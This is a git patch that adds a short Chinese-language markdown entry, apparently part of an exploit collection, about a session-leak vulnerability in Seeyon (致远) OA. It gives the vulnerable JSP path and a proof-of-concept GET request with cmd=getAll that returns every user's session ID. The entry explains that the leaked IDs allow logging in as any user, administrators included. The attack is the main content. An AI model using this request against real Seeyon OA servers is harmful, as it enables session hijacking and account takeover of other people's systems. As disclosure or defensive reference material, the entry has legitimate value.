From 9ab1f985d6bc3e3c9f0f32f7583ab218ef92d01a Mon Sep 17 00:00:00 2001
From: helloexp <21156949+helloexp@users.noreply.github.com>
Date: Wed, 1 Jun 2022 11:01:35 +0800
Subject: [PATCH] =?UTF-8?q?=E8=87=B4=E8=BF=9COA=20Session=E6=B3=84?=
 =?UTF-8?q?=E6=BC=8F=E6=BC=8F=E6=B4=9E?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 .../致远OA Session泄漏漏洞.md                     | 15 +++++++++++++++
 1 file changed, 15 insertions(+)
 create mode 100644 13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md

diff --git a/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md
new file mode 100644
index 0000000..527c551
--- /dev/null
+++ b/13-致远oa/致远OA Session泄漏漏洞/致远OA Session泄漏漏洞.md	
@@ -0,0 +1,15 @@
+# 致远OA Session泄漏漏洞
+
+## 漏洞位置
+```http request
+http://test.com/yyoa/ext/https/getSessionList.jsp
+```
+> 当cmd参数为getAll时，便可获取到所有用户的SessionID利用泄露的SessionID即可登录该用户，包括管理员
+
+
+## POC
+```http request
+http://test.com/yyoa/ext/https/getSessionList.jsp?cmd=getAll
+```
+
+通过get 方式访问上述url 后，可以在返回包中看到session 信息
\ No newline at end of file